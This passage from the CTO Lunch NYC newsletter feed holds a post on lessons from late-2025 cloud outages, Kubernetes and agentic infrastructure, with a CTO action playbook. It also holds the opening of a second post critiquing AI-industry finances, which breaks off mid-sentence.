/__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!RDz9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg" width="800" height="443" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:443,&quot;width&quot;:800,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:24482,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/180062001?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!RDz9!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb3a3fcf-28af-44d6-a8fb-c1b2b2ffa7e5_800x443.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This isn&#8217;t &#8220;move fast and break things&#8221; as an ethos, but a culture where moving fast means things <em>will</em> occasionally break catastrophically. (Don&#8217;t get me started on <strong>dromology</strong>.) The critical question for CTOs isn&#8217;t whether to optimize for velocity or stability, but how to ensure your organization&#8217;s impressive speed in shipping features and patching defects doesn&#8217;t also manifest in an existential operational lapse. The infrastructure providers you depend on are making the same tradeoff you are, highlighting a fundamental fragility in the hyperscale model, except their failures cascade across thousands of customers. Tier 3 Cloud providers capture margin by abstracting complexity, but that abstraction often creates <a href="/__u/ctolunchnyc.substack.com/p/dont-lose-sleep-over-it#:~:text=stayed%20up.%20But-,the%20global%20control%20plane,-anchored%20in%20us">centralized control planes</a> that can fail catastrophically. When AWS&#8217;s control plane goes down, you lose infra access even though the underlying compute is fine. When Cloudflare&#8217;s edge worker panics, it&#8217;s not just their problem but yours, your customers&#8217; and everyone downstream who didn&#8217;t read the subprocessors page. </p><div class="pullquote"><p> <strong>The infrastructure substrate needs to support autonomous operations because the centralized control planes we&#8217;ve been depending on can&#8217;t absorb the operational complexity</strong></p></div><p><strong>KubeCon 2025 crystallized what the outages made implicit</strong>: K8s adoption is accelerating precisely because it&#8217;s the hedge against Tier 3 provider failures. The infrastructure substrate needs to support autonomous operations because centralized control planes cannot absorb the operational complexity of modern workloads not to even mention the impending but already ongoing hyperscale that AI workloads create. Kubernetes isn&#8217;t winning because it&#8217;s technically superior. It&#8217;s winning because it&#8217;s the only widely-adopted substrate that provides the operational primitives both resilient architecture and agentic AI and require: dynamic resource allocation, declarative configuration that survives control-plane failures, and RBAC policies that can constrain autonomous actors.</p><p>This connects directly to the Tier 3 economics described above. Cloud providers (Tier 3) are capturing margin by abstracting infrastructure complexity, but that abstraction creates single points of failure. When AWS&#8217;s control plane goes down, you lose access to your infrastructure <em>even though the underlying compute is fine.</em> When Azure&#8217;s Front Door misconfigures, your applications become unreachable even though your services are running. The Tier 3 business model is predicated on centralized control planes that can fail catastrophically, which explains Kubernetes adoption is accelerating: it&#8217;s the hedge against Tier 3 provider failures because the control plane runs in your infrastructure, not theirs.</p><p><strong>Three trends converged at KubeCon 2025 that highlight this transformation.</strong></p><ol><li><p><strong>AI Workflows Go Operational:</strong> Agentic workflows moved from experimental to operational, which means they now schedule their own compute and provision their own resources. This requires an infrastructure that can safely delegate operational control to non-human actors, making Kubernetes&#8217; declarative model and RBAC primitives safety-critical not just organizational convenience. <strong>Kubernetes Agent Sandbox</strong>, v1 introduced at KubeCon, provides a pre-provisioned TEE for autonomous agents, maintaining stable identity while offloading lifecycle management and resource orchestration to the cluster control plane, allowing agents execute autonomously, repeatedly, and safely, w/o needing to encode lifecycle or orchestration logic themselves. </p></li><li><p><strong>Platform Engineering Graduates:</strong> <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-october-2025#:~:text=is%20repricing%20accordingly.-,Platform%20engineering,-became%20the%20conference%E2%80%99s">Platform engineering</a> has graduated from buzzword to discipline; its no longer about DX, but building robust guardrails that prevent your engineers, or your agents, from committing the equivalent of Cloudflare&#8217;s <code>.unwrap()</code> incident. Deprecations of ingress-nginx forces devops teams to confront whether they understood their actual ingress requirements or just copy-pasted manifests from <a href="https://stackoverflow.com/">SO</a>. Helm 4.0.0 shipped with breaking changes that exposed which teams treated it as a package manager (correct) versus config management (wrong). Teams that understood the distinction migrated smoothly; teams that didn&#8217;t spent November firefighting. </p></li><li><p><strong>Observability Shifts to Insight:</strong> Traditional observability (logs, dashboards, monitoring) was built for predictable systems operated by humans. Agentic systems are neither. When an agent scales your cluster, you need to know <em>why</em> it decided chosen value was correct, whether that decision aligned with your cost constraints, and what would have happened if that target was set higher or lower. Tooling is evolving from &#8220;what happened&#8221; to why did the system <strong>decide</strong> this was the right action, which is the only way to trust autonomous operations. During the November outages, cloud providers were briefly flying blind because their observability depended on the same planes that were failing. Medusa Cascade. The next generation of ops requires observability that remains visible even when the system&#8217;s own sensors go dark. Let&#8217;s hope it&#8217;s not the naked leading the blind. </p></li></ol><p>Pulumi versus OpenTofu highlights the infrastructure-as-code implications. OpenTofu is declarative, generally human-authored, IAC. Pulumi is imperative, programmatic, and increasingly optimised for codegen. For human operators, OpenTofu&#8217;s declarative model is easier to reason about. For AI agents, Pulumi&#8217;s programmatic interface is the only model that works because agents can&#8217;t meaningfully generate declarative HCL, but they can generate TypeScript or Python that calls Pulumi&#8217;s SDK. Companies betting on AI-native SDLC are standardizing on Pulumi because it&#8217;s the only infrastructure-as-code paradigm that survives contact with autonomous agents generating infrastructure definitions. (But frankly, things could have turned out much differently if the big BLC brouhaha had not happened.) </p><h2>What This Means For CTOs</h2><h5><strong>Architecting for Dependency Resilience</strong></h5><p>The consolidation around three hyperscale infrastructure providers creates systemic risk that <strong>most CTOs haven&#8217;t priced correctly</strong>. When a fifth of the global web depends on Cloudflare&#8217;s edge network, Cloudflare&#8217;s outages become everyone&#8217;s outages. When Azure Front Door routes traffic for millions of enterprise apps, Azure&#8217;s configuration mistakes become your revenue loss. The distributed Internet still exists, but we stopped using it because abstraction layers made centralization cheaper and faster than running your own infrastructure (allowing companies to focus more resources on their respective business domains, changing the face of software consultancy.)</p><p>This isn&#8217;t a call to repatriate to on-prem datacenters. It&#8217;s recognition that the infrastructure layer&#8217;s increasing fragility changes the ROI calculation for redundancy. Multi-cloud used to be expensive insurance that most companies couldn&#8217;t justify. After three Tier 1 outages in three weeks, it&#8217;s starting to look like operational necessity. (<a href="/__u/ctolunchnyc.substack.com/p/dont-lose-sleep-over-it#:~:text=The%20companies%20that%20survived%20weren%E2%80%99t%20using%20multi%2Dcloud%20voodoo%3B%20they%20understood%20the%20distinction%20between%20control%20plane%20and%20data%20plane.">Assuming you have your control plane issues sorted</a>.) The companies that architected for single-provider dependence are repricing that decision now that the blast radius is measured in hours of lost revenue, not hypothetical risk scenarios.</p><p>The agentic infrastructure shift amplifies this pressure. When AI agents are provisioning resources, scaling workloads, and making deployment decisions, the failure modes multiply. A human operator making a mistake triggers one incident. An agent making a mistake triggers hundreds of incidents simultaneously because it&#8217;s operating at machine speed across your entire fleet. The infrastructure patterns that worked for human-operated systems (manual approval gates, change management processes, slow rollout schedules) don&#8217;t translate to agentic operations. You either build automated guardrails that can constrain agent behavior without blocking legitimate actions, or you accept that agent-authored infrastructure changes will periodically take down production in novel and spectacular ways.</p><p>Platform engineering&#8217;s maturation is the industry&#8217;s response to this complexity. Teams that treated platform engineering as &#8220;DevOps with a new name&#8221; are struggling. The teams that built actual platforms (internal abstractions that hide infrastructure complexity while maintaining operational control) are shipping faster with fewer outages. Kubernetes, Terraform and Helm (which just celebrated its 4.0 release) are primitives, not platforms. The platform is what you build on top of them that lets your engineers and your agents deploy safely <em>without needing to understand</em> the underlying infrastructure.</p><p>You&#8217;re not architecting for resilience against infrastructure <em>failure</em> anymore. You&#8217;re architecting for resilience against infrastructure <em>dependency</em>. The outages at Cloudflare, Azure, and AWS weren&#8217;t infrastructure failures but dependency failures, where small changes cascaded through systems that had become too centralized to fail gracefully.</p><h3>CTO Playbook: 30/60/90</h3><ul><li><p><strong>Pre-generate Cloudflare API tokens</strong> (CRITICAL: Immediate) If you use Cloudflare, generate backup API tokens now and store them in a separate secret management system. When Cloudflare&#8217;s control plane goes down, you can&#8217;t generate new tokens, which means you can&#8217;t route around the failure. Teams without pre-generated tokens were locked out for three hours in November.</p></li><li><p><strong>Map transitive dependencies</strong> (HIGH PRIORITY: EOY) Audit your infrastructure for hidden upstream dependencies. Check your CDN provider&#8217;s subprocessors page. Verify your managed database doesn&#8217;t route through a shared dependency. Assume every managed service has upstream dependencies the vendor didn&#8217;t disclose.</p></li><li><p><strong>Test failover paths</strong> (MEDIUM-HIGH PRIORITY: 45 days ) Run tabletop exercises where your primary cloud provider is unavailable for four hours. Can you route traffic to backup regions? Can you fail over databases? Can you deploy without access to your CI/CD system? If the answer is no, you don&#8217;t have a failover plan but a hope-based strategy.</p></li><li><p><strong>Kubernetes migration plan</strong> (MEDIUM PRIORITY: 60 days) If you&#8217;re not running Kubernetes, create a migration roadmap. If you are running Kubernetes, audit whether your manifests are agent-compatible: declarative, versioned, and safe for programmatic generation.</p></li><li><p><strong>Observability upgrade</strong> (MEDIUM PRIORITY: 60 days) Implement decision tracing for any autonomous systems. Logs and metrics aren&#8217;t enough when agents are making operational decisions. You need instrumentation that captures why the agent chose a specific action, not just what action it took.</p></li><li><p><strong>Infrastructure-as-code audit</strong> (MEDIUM PRIORITY: 60 days) If you&#8217;re on Terraform/OpenTofu and planning to integrate agents, evaluate Pulumi. The migration cost is real, but it&#8217;s lower today than it will be in six months when your entire stack is codified in HCL that agents can&#8217;t meaningfully generate.</p></li><li><p><strong>Multi-cloud failover</strong> (LOW PRIORITY: 90- days) Architect critical paths for multi-provider redundancy. This doesn&#8217;t mean running everything on AWS and Azure simultaneously. It means ensuring your most critical workloads can fail over to a different provider without manual intervention.</p></li><li><p><strong>Platform engineering investment</strong> (LOW PRIORITY: 90 days) If you don&#8217;t have an internal platform team, build one. If you have one, audit whether they&#8217;re building abstractions or just managing infrastructure. The goal is enabling engineers and agents to deploy safely without understanding underlying infrastructure complexity.</p></li><li><p><strong>Vendor concentration risk analysis</strong> (LOW PRIORITY: 90 days) Calculate what percentage of your infrastructure depends on a single provider. If it&#8217;s over 70%, you have existential concentration risk. Document alternatives, migration costs, and failover timelines. Present to your board before they ask why a Cloudflare outage cost you hours and hours of revenue.</p></li></ul><h3>Bottom Line</h3><p>Your immediate decision is whether to accept single-provider risk or architect for multi-provider redundancy. Multi-cloud used to be expensive insurance most companies skipped. After November 2025, <s>it&#8217;s the only architecture that survives Tier 1 provider outages.</s> This doesn&#8217;t mean running identical infrastructure across AWS and Azure. It means architecting workloads so critical paths can route around provider failures without manual intervention. Static sites can fail over to different CDNs. APIs can route to backup regions on different cloud providers. Databases can maintain hot replicas across providers for failover scenarios. The cost is higher. The operational complexity is higher. The alternative is explaining to your board why a WHERE clause at Cloudflare took down your revenue for half a day.</p><p>The agentic infrastructure requirements are orthogonal but equally urgent. If you&#8217;re not already running Kubernetes, consider a migration plan. Not because Kubernetes is perfect, but because it&#8217;s the only substrate with enough adoption, tooling maturity, and operational primitives to safely run agentic workloads at scale. Teams still hand-rolling infrastructure or running on managed platforms will hit scaling limits the moment they try to deploy agents that need dynamic resource allocation across heterogeneous hardware. Which is ofc one of the main points of agents. </p><p>Your observability must evolve from &#8220;what happened&#8221; to &#8220;why did the system <em><strong>decide</strong></em> this.&#8221; Traditional monitoring tells you your inference cluster scaled to 100 nodes. Agent-aware observability tells you the agent predicted demand based on historical patterns, chose 100 nodes to maintain latency SLAs, <strong>and stayed within budget</strong>. Without decision traces, you can&#8217;t trust autonomous operations, which means you can&#8217;t delegate operational control to agents, which means you&#8217;re stuck with human-operated systems that can&#8217;t scale at the pace AI workloads require.</p><p>Either way, you&#8217;re in for a pound. </p><div><hr></div><p><em>To attend CTO Lunches, please register at <a href="http://ctolunches.com/">ctolunches.com</a> and choose NYC as your city.</em></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe for free to receive monthly updates from CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div>]]></content:encoded></item><item><title><![CDATA[Turning Sand into Money]]></title><description><![CDATA[Why the Cost of Beached Assets Will Implode the 5:1 Capex-to-Revenue Ratio.]]></description><link>https://ctolunchnyc.substack.com/p/turning-sand-into-money</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/turning-sand-into-money</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Mon, 01 Dec 2025 13:02:58 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/e9ad9543-1cd5-42ab-a573-15dabe8844bc_1024x638.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!dZdA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 424w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 848w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 1272w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!dZdA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png" width="1024" height="638" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:638,&quot;width&quot;:1024,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1128010,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/180075060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 424w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 848w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 1272w, /__u/substackcdn.com/image/fetch/$s_!dZdA!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F42b0e2e5-9554-430b-9b2d-2bf9d78f1e51_1024x638.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>The AI economy begins with sand.</strong> TSMC takes silicon dioxide, literally beach sand, and through $20 billion fabrication plants transforms it into chips worth 10,000x the raw material cost. Nvidia takes those chips and turns them into H100 GPUs selling for $30,000 apiece. Microsoft takes those GPUs and rents them by the hour at 80% gross margins. OpenAI takes that compute and burns it training models they sell through APIs at a loss. And somewhere, theoretically, an enterprise customer takes that API access and builds an application that generates actual economic value.</p><p>This is the five-tier value chain of AI:</p><p><code> silicon &#8594; GPUs &#8594; cloud &#8594; models &#8594; applications</code></p><p>In a functioning market, each tier captures margin by adding differentiation. In the AI market, only Tier 1 is making money. Everything else is playing hot potato with credit lines, hoping the music doesn&#8217;t stop before the applications tier materializes.</p><p>Peter Thiel sold $100 million in Nvidia stock on November 9th, mere days before their earnings call. Michael Burry bought put options betting Nvidia crashes to $140 by March 2026. Both are reading the same balance sheets you should be.</p><h2><strong>Context and Background</strong></h2><p><strong>Tier 2 reveals the structural problem when you strip away the narrative.</strong> Nvidia reported $19.3 billion in profit for Q3. They generated $14.5 billion in actual cash. That $4.8 billion gap is is so far from a rounding error it&#8217;s basically Voyager 1, calling in from <a href="https://x.com/forestmars/status/1993721954826965152">a full light-day away</a>. The widespread pattern across Mag7 is revenue being booked before money changes hands. Healthy chip companies like TSMC and AMD convert over 95% of reported profits into cash. Nvidia converts 75%. The gap gets filled with $33.4 billion in unpaid bills (up 89% year-over-year) and $19.8 billion in unsold inventory (up 32%).</p><p>Obvious <a href="https://www.linkedin.com/feed/update/urn:li:activity:7397309455614513154?commentUrn=urn%3Ali%3Acomment%3A%28activity%3A7397309455614513154%2C7397418051014455296%29&amp;dashCommentUrn=urn%3Ali%3Afsd_comment%3A%287397418051014455296%2Curn%3Ali%3Aactivity%3A7397309455614513154%29">round-trippin</a>g is obvious: Nvidia invests $2 billion in xAI. xAI borrows $12.5 billion to buy Nvidia chips. Microsoft gives OpenAI $13 billion. OpenAI commits $50 billion to buy Microsoft cloud. Microsoft orders $100 billion in Nvidia chips to build that cloud. Oracle extends $300 billion in cloud credits to OpenAI. OpenAI orders Nvidia chips for Oracle data centers. In November, Microsoft and Nvidia poured $15 billion into Anthropic, valuing it at $350 billion, triple the $183 billion valuation from their September Series F! Nvidia is simultaneously investing $5 billion in Intel and $10 billion more in Anthropic.</p><p>Call it strategic partnerships if you want. Well, sure, whatever. The accounting structure is identical to Enron&#8217;s special purpose entities: circular flows where everyone is simultaneously creditor and debtor, booking forward orders as revenue, <strong>using GPU allocations as a form of credit.</strong> The system stays upright through forward momentum. The moment someone downstream can&#8217;t convert compute into paying customers, the circle breaks and the unpaid bills become writedowns. </p><p><strong>The tier economics reveal where value is actually trapped</strong> versus where everyone thinks it&#8217;s being created. Tier 1 (silicon fabrication) has real margins and real cash generation; TSMC&#8217;s order book is full three years out, and even if competitors could build fabs, it takes three years and $20 billion per plant. Tier 2 (GPUs) looks profitable but that 75% cash conversion rate means Nvidia is booking revenue faster than collecting payment. Tier 3 (cloud) reports growth while simultaneously being its own largest customer: Microsoft &#8220;sells&#8221; cloud to OpenAI using Microsoft&#8217;s own investment capital, recording revenue despite cash never leaving the loop. Tier 4 (models) burns $3-5 for every $1 of revenue generated. Tier 5 (applications) barely exists at scale. </p><p><strong>The unit economics make this explicit.</strong> America is deploying $400 billion per year in AI capex right now. For this not to be a bubble, we need $400 billion-plus in annual revenue from Tier 5 by decade&#8217;s end. OpenAI and Anthropic are spending roughly $100 billion in capex (indirectly, through Microsoft and Amazon). Their combined 2025 revenue: $20 billion. That&#8217;s a 5:1 capex-to-revenue ratio, which works in hypergrowth markets if <em>and only if</em> the infrastructure being built today generates enough lifetime value to exceed its construction costs before it becomes economically obsolete.</p><p><strong>Here&#8217;s where capex and opex tensions collide with tier economics</strong>. Traditionally, infrastructure is capex: you buy it, own it, depreciate it over five years, extract value across its economic life. AI infrastructure is moving too fast for this model. H100s launched in 2023. H200s shipped in 2024. Blackwell is ramping now. Your $30,000 GPU is economically obsolete in 18 months but depreciated over 60 months. The gap between book value and market value compounds every quarter, which is why nobody can answer the Reddit thread asking where data centers are dumping old GPUs; admitting you&#8217;re replacing hardware after two years destroys the depreciation fiction holding your P&amp;L together.</p><p><strong>The major labs handle this by treating infrastructure like capex on paper</strong> (stretching depreciation timelines to smooth reported costs) while treating it like opex practically (maintaining flexibility to swap hardware on rapid cycles). It&#8217;s not illegal, but it creates a systemic mismatch between reported profits and cash generation. When 45% of fund managers tell Bank of America that an AI bubble is their biggest tail risk, they&#8217;re not worried about model benchmarks. They&#8217;re worried about what happens when depreciation schedules collide with replacement reality and someone takes a writedown large enough to spook the index funds auto-allocating into these positions. These are the actual bubble dynamics. </p><h3><strong>Bubblenomics: Ideology, Formatted in Excel</strong></h3><p><strong>OpenAI&#8217;s $1.5 trillion credit card is maxed out.</strong> CEO Sam Altman has projected spending commitments exceeding $1.4 trillion over the next several years, creating a shortfall of roughly $1.2 <strong>trillion</strong> against current cash reserves. They had $3.5 billion in revenue against $5.3 billion in operating losses in 2024. First half of 2025: $4.3 billion in revenue, $7.8 billion in losses. Third quarter alone: $12 billion in losses. (I&#8217;m literally LOLing here.) They&#8217;re projecting $115 billion in cumulative burn by 2029, at which point they <em>claim</em> profitability. The Financial Times calculates OpenAI needs to raise at least $207 billion by 2030 just to continue operating at current burn rates. For their valuation to hold, their $20 billion in current revenue must grow 32x to $650 billion in five years while their flagship model ranks 95th on benchmarks.</p><p>Altman&#8217;s rookie moves aren&#8217;t helping. Last month he announced Stargate would consume 40% of global DRAM supply. Prices rocketed 3x before he secured funding or supply contracts, making his own infrastructure roadmap 3x more expensive by telegraphing demand without locking in capacity. This is what happens when tech 